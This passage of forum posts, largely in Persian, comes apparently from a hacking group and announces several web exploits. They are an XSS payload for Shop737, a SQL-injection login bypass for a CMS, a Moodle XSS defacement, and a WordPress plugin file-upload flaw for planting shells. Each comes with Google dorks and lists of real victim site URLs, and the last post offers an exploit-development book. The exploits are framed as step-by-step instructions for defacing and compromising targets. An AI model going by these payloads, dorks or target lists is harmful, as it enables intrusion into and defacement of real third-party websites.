http://susu-bubuk.comX/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://bestbeachbungXalows.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://www.ptskk.coXm/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://www.goholidayX-tour.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://www.kristalboXhemia.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://www.kristalbXohemia.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E ######################################################## # Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | BLACKH4T # We Are Guardiran Security Team # Discovered By:DeMoN ########################################################
  21. با عرض سلام و خسته نباشید. ثبت اکسپلویت (Shop737/Cross Site Scripting(XSS توسط تیم امنیتی گارد ایران رو به تمامی اعضا محترم گارد ایران تبریک عرض میکنم. به امید موفقیت های روزافزون. https://cxsecurity.com/issue/WLB-2015110107 http://iedb.ir/exploits-4123.html ######################################################## # Exploit Title: Shop737/Cross Site Scripting(XSS) ######################################################## # Google Dork: inurl:"poto" intext:"powered by Shop737" # Date: [14/11/2015] # Exploit Author: Guardiran Security Team =>DeMoN # Vendor Homepage: [http://www.shop737.com/] # Software Link: [-] # Version: All Version # Tested on: [Win 8.1/Google chrome] # CVE : [-] ######################################################## # DISCRIPTION: Hello Guys. # That sites Have XSS Or Cross Site Scripting Bug. # Please Enter Dork In Google And Open Your Target. # Then add This Script # ["><marquee><h1>Hacked_By_DeMoN_guardiran.org</h1></marquee>] # In Target after Yhis Section # [index.php?imgdir=] # Then You See That Your Script Accomplished. # GooD LucK ######################################################## # Demo: # http://www.pasirindo.cXom/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://susu-bubuk.coXm/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://bestbeachbunXgalows.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://www.ptskk.cXom/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://www.goholidaXy-tour.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://www.kristalbXohemia.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://www.kristalXbohemia.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E ######################################################## # Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | BLACKH4T # We Are Guardiran Security Team # Discovered By:DeMoN ######################################################## My Best Friends: The First God C0d3!nj3ct!0n REX GrYpHoN BLACKH4T abarestan GooD LucK
  22. ثبت اکسپلویت Arveen Tazh Afarin CMS Login page Bypass Vulnerability به نام تیم امنیتی گارد ایران(Guardiran Security Team). به امید پیشرفت های روز افزون. یا حق https://cxsecurity.com/issue/WLB-2015110058 http://iedb.ir/exploits-4080.html ######################################################## # Exploit Title: Arveen Tazh Afarin CMS Login page Bypass Vulnerability ######################################################## # Google Dork: intext:Powered & design by ARVEEN TAZH AFARIN # Date: [08/11/2015] # Exploit Author: Guardiran Security Team =>DeMoN # Vendor Homepage: [http://arveentazh.en.ec21.com/] # Software Link: [-] # Version: All Version # Tested on: [Win 8.1/Google chrome] # CVE : [-] ######################################################## # DISCRIPTION: Hello Guys.You Have To Enter This Dork And Bypass The Login Page And Do Anythink In Your Target. ######################################################## # 'Username : '=''or # # 'Password : '=''or ####################################################### # Demo: # http://roudbaXrak.com/modir.php # http://ariasaXyan.ir/modir.php # http://atouXrs.ir/modir.php ######################################################## # Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | BLACKH4T # We Are Guardiran Security Team # Discovered By:DeMoN######################################################## My Best Friends The Fitst GOD GrYpHoN BLACKH4T REX C0d3!nj3ct10n
  23. با عرض سلام و خسته نباشید. ثبت اسکپلویت Moodle cms/Cross Site Scripting(XSSبه نام تیم گارد ایران سکیوریتی تیم. https://cxsecurity.com/issue/WLB-2015110051 http://iedb.ir/exploits-4074.html ######################################################## # Exploit Title: Moodle cms/Cross Site Scripting(XSS) ######################################################## # Google Dork: inurl:/course/category.php?id= # Date: [06/11/2015] # Exploit Author: Guardiran Security Team =>DeMoN # Vendor Homepage: [https://moodle.org/] # Software Link: [-] # Version: All Version # Tested on: [Win 8.1/Google chrome] # CVE : [-] ######################################################## # DISCRIPTION: Hello Guys.The First Enter The Dork In Google And Open The Target. # Then Replace This Code # [/help.php?text=hecked_text] # Instead # [/course/category.php?id=] # And Replace Your Text Deface At [hecked_text] And You See That To Site Defaced With You. ######################################################## # Demo: # http://moodle.jonfila.Xcom/help.php?text=Hacked_By_DeMoN # http://elearning.noeXtic.org/help.php?text=Hacked_By_DeMoN # http://nehacert.org/Xmoodle/help.php?text=Hacked_By_DeMoN # http://dwmbeancoXunter.com/moodle/help.php?text=Hacked_By_DeMoN # http://ipesvirtual.Xdfpd.edu.uy/help.php?text=Hacked_By_DeMoN # http://clickandleXarn.bmgi.org/help.php?text=Hacked_By_DeMoN # http://learnonlxine.health.nz/help.php?text=Hacked_By_DeMoN ######################################################## # Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | BLACKH4T # We Are Guardiran Security Team # Discovered By:DeMoN ########################################################
  24. سلام خدمت اعضا محترم گارد ایران. کشف باگ Wordpress Plugin easy-comment-uploads File Upload Vulendrability توسط تیم و ثبت آن به نام گارد ایران سکیوریتی تیم(Guardiran) https://cxsecurity.com/issue/WLB-2015110049 http://iedb.ir/exploits-4073.html ######################################################## Exploit Title: Wordpress Plugin easy-comment-uploads File Upload Vulendrability # ######################################################## Google Dork: inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php # Date: [06/11/2015] # Exploit Author: Guardiran Security Team =>DeMoN # Vendor # Homepage: [https://wordpress.org/support/topic/plugin-easy-comment-uploads-got-hacked-because-of-this-plugin] Software Link: [-]# Version: [-]# Tested on: [Win 8.1/Google chrome]# CVE : [-]# ######################################################## DISCRIPTION: Hello Guys.You Can Upload Deafce Oage Or Your Shell.When You Uploaded Your Files# You Have To Go To This Section.# [/wp-content/uploads/2015/].# Please Pay Attention.Today Is 06/11/2015.If You Going To Upload Your Files In One Month Later# The Link Of Your Files Will Be# [/wp-content/uploads/2015/07].# GooD LucK My Friends.# ######################################################## Demo:# https://www.fairyhouses.Xcom/wp-content/plugins/easy-comment-uploads/upload-form.php# http://www.mukorom.inXfo/wp-content/plugins/easy-comment-uploads/upload-form.php# http://www.toiwhakaarXi.ac.nz/wp-content/plugins/easy-comment-uploads/upload-form.php# http://www.ritalee.coXm.br/blog/wp-content/plugins/easy-comment-uploads/upload-form.php# http://www.asecretgXiftbook.com/wp-content/plugins/easy-comment-uploads/upload-form.php# http://www.wildschXoenau.tv/wp-content/plugins/easy-comment-uploads/upload-form.php# http://www.nekudXathibur.com/wp-content/plugins/easy-comment-uploads/upload-form.php# ######################################################## Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | BLACKH4T We Are Guardiran Security Team# Discovered By:DeMoN# ########################################################
  25. در این کتاب آموزشی با مباحث زیر آشنا خواهید شد و برای دوستانی که به مبحث اکسپلویت نویسی Exploit Programming علاقه دارند بسیار مفید خواهد بود و مباحث عبارتند از : ساختار و طرز عملکرد اکسپلویت ها طرز نوشتن اکسپلویت ها و شل کد ها مشکلات مشترک در اکسپلویت نویسی ها و بسیاری از مباحث مهم و کاربردی توضیح داده شده است . پسورد : guardiran.org . Exploit Development Advanced.rar